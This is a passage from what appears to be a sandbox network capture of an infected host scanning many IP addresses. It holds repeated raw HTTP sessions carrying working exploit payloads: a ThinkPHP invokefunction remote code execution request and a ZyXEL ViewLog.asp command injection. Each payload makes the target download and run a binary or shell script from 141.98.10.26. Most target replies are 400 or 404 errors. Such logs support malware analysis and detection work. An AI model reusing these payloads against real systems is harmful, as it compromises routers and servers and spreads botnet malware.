Nov 22, 2023 08:39:06.903259039 CET	9404	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:06 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
485	192.168.2.23	55388	88.217.85.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.806153059 CET	9404	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
486	192.168.2.23	35218	88.237.122.194	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.957681894 CET	9405	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:07.213294029 CET	9410	IN	HTTP/1.1 404 Not Found Content-type: text/html Date: Wed, 22 Nov 2023 07:39:07 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
487	192.168.2.23	35224	88.237.122.194	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:07.449543953 CET	9481	IN	HTTP/1.1 400 Bad Request Content-type: text/html Date: Wed, 22 Nov 2023 07:39:07 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
488	192.168.2.23	36904	94.121.115.197	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:07.590670109 CET	9508	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
489	192.168.2.23	49854	31.136.97.131	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:07.772995949 CET	9510	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:08.328921080 CET	9620	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:09.448821068 CET	9734	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:11.880496979 CET	9980	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:16.487806082 CET	10578	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:25.446548939 CET	11658	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:44.388001919 CET	13934	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:21.246762991 CET	18343	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
490	192.168.2.23	41398	85.247.156.98	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:07.796081066 CET	9512	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:08.008951902 CET	9515	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
491	192.168.2.23	50886	94.122.7.162	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:07.815190077 CET	9513	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
492	192.168.2.23	36162	94.122.110.20	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:07.817250967 CET	9514	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
493	192.168.2.23	52736	85.75.69.151	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:08.039962053 CET	9516	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
494	192.168.2.23	41412	85.247.156.98	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:08.217791080 CET	9527	IN	HTTP/1.1 414 Request-URI Too Large Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
495	192.168.2.23	52962	31.33.10.126	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.509965897 CET	9734	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:10.088690996 CET	9767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:11.208564997 CET	9882	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
496	192.168.2.23	36540	112.126.167.31	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.520577908 CET	9745	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:09.828908920 CET	9758	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:36:40 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
497	192.168.2.23	34600	94.168.122.142	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.536844969 CET	9747	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:10.574927092 CET	9805	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:09 GMT Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
498	192.168.2.23	58748	62.204.143.211	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.547563076 CET	9748	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:09.760189056 CET	9756	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 09:44:51 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
499	192.168.2.23	50062	62.29.88.51	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.556365013 CET	9749	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
500	192.168.2.23	54994	112.197.122.90	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.591903925 CET	9750	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:09.978470087 CET	9764	IN	HTTP/1.0 400 Bad Request Date: Wed, 22 Nov 2023 14:39:09 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
501	192.168.2.23	57004	95.130.253.242	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.701276064 CET	9753	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:09.881722927 CET	9760	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:09 GMT Server: Apache X-Robots-Tag: none Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
502	192.168.2.23	34344	95.101.219.246	80

Timestamp	kBytes transferred	Direction	Data
